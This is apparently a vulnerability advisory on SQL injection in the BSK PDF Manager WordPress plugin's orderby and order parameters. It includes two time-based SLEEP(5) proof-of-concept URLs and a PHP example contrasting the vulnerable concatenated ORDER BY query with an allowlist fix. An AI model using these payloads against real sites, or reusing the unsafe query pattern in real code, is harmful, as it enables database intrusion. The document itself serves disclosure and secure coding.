The plugin does not validate or escape the orderby and order parameters before using them in a SQL statement, leading to SQL injection.
With at least one BSK PDF Category:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-11-01 (about 1 year ago)
2022-09-26 (about 4 months ago)
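
The pattern described above next to an allowlist-based fix, as an added example that is not the plugin's own code. The table name pdf_list, the columns id and title, the function names, and the backtick quoting of orderby in the unsafe query are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. The table name, the columns other
// than last_date, and the function names are assumptions.
const SORT_COLUMNS    = ['id', 'title', 'last_date'];
const SORT_DIRECTIONS = ['ASC', 'DESC'];

// Pattern the advisory describes: request values are concatenated into the
// ORDER BY clause, so the database parses them as SQL.
function list_query_unsafe(array $request): string
{
    $orderby = $request['orderby'] ?? 'last_date';
    $order   = $request['order'] ?? 'DESC';
    return "SELECT * FROM pdf_list ORDER BY `{$orderby}` {$order}";
}

// Hardened form: column names and sort keywords cannot be bound as
// prepared-statement parameters, so each must equal an allowlisted value.
function list_query_safe(array $request): string
{
    $orderby = $request['orderby'] ?? null;
    $order   = $request['order'] ?? null;
    // Non-string input (e.g. orderby[]=x) and unknown values fall back to defaults.
    if (!is_string($orderby) || !in_array($orderby, SORT_COLUMNS, true)) {
        $orderby = 'last_date';
    }
    $order = is_string($order) ? strtoupper($order) : 'DESC';
    if (!in_array($order, SORT_DIRECTIONS, true)) {
        $order = 'DESC';
    }
    return "SELECT * FROM pdf_list ORDER BY `{$orderby}` {$order}";
}

// Constructed inputs: one ordinary request plus the two parameter values
// from the advisory's URLs, URL-decoded.
$samples = [
    ['orderby' => 'title', 'order' => 'asc'],
    ['order' => 'and sleep(5)'],
    ['orderby' => 'last_date` AND SLEEP(5) OR `last_date'],
];
foreach ($samples as $request) {
    echo 'unsafe: ', list_query_unsafe($request), PHP_EOL;
    echo 'safe:   ', list_query_safe($request), PHP_EOL, PHP_EOL;
}
```

Escaping functions meant for string literals do not help here, because the values land in identifier and keyword positions; an exact-match allowlist is what keeps request data out of the SQL grammar.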